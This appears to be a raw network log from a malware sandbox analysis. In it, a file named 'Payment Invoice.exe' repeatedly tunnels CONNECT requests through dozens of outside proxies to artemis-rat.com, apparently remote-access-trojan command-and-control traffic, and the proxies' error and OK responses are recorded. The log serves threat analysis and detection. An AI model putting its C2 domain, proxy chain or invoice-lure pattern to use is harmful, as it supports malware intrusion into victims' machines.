                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                841192.168.2.451955187.210.136.8841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.016625881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                842192.168.2.452514124.163.236.5473027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.017982960 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:18.491024017 CET90INHTTP/1.1 200 OK
                                                                Content-Type: application/json
                                                                Connection: close
                                                                Content-Length: 55


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                843192.168.2.451925148.72.23.5648337076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.019910097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.089273930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.183450937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.238452911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.335969925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.386137009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:54.448700905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                844192.168.2.452520212.220.13.9841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.020720959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                845192.168.2.45046367.43.227.230254917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.020725012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.020713091 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                846192.168.2.451965174.138.94.117807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.020876884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.089337111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.183450937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.238482952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.335969925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.387507915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.387612104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.386610985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:18.511193037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                847192.168.2.450473104.238.111.107537777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.020879030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.120460033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.124047041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.323896885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.323839903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                848192.168.2.45254670.166.167.55577457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.020946980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                849192.168.2.45256131.223.184.143807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.020992041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.375389099 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:24 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                850192.168.2.45252243.231.22.229807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.021037102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.485275984 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                851192.168.2.45171749.4.48.12888887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.021070957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.392784119 CET179INHTTP/1.1 504 Gateway Time-out
                                                                Server: nginx/1.20.1
                                                                Date: Mon, 11 Mar 2024 15:15:28 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 494
                                                                Connection: close
                                                                ETag: "658e91eb-1ee"
                                                                Mar 11, 2024 16:15:31.402704000 CET179INHTTP/1.1 504 Gateway Time-out
                                                                Server: nginx/1.20.1
                                                                Date: Mon, 11 Mar 2024 15:15:28 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 494
                                                                Connection: close
                                                                ETag: "658e91eb-1ee"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                852192.168.2.452541154.12.178.107299857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.021132946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                853192.168.2.450334103.84.178.241537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.021239042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                854192.168.2.45253458.75.126.23541457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.021373034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                855192.168.2.450314182.72.203.255807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.021683931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.531246901 CET806INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:36 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 614
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                856192.168.2.45260845.60.186.208274887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.023494959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                857192.168.2.45253545.195.149.7910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.023674011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                858192.168.2.452519222.138.76.690027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.031315088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                859192.168.2.45256318.169.83.8710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.031670094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.326718092 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                860192.168.2.451927107.180.88.173365037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.038193941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                861192.168.2.451942107.180.88.173445687076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.038254023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.120522022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.124058962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.323919058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                862192.168.2.45254337.235.48.19807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.040560007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                863192.168.2.452542210.72.11.4680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.041155100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.776839972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.108360052 CET536INHTTP/1.1 503 Service Unavailable
                                                                Server: squid/3.5.27
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3685
                                                                X-Squid-Error: ERR_CONNECT_FAIL 101
                                                                Vary: Accept-Language
                                                                Content-Language: en
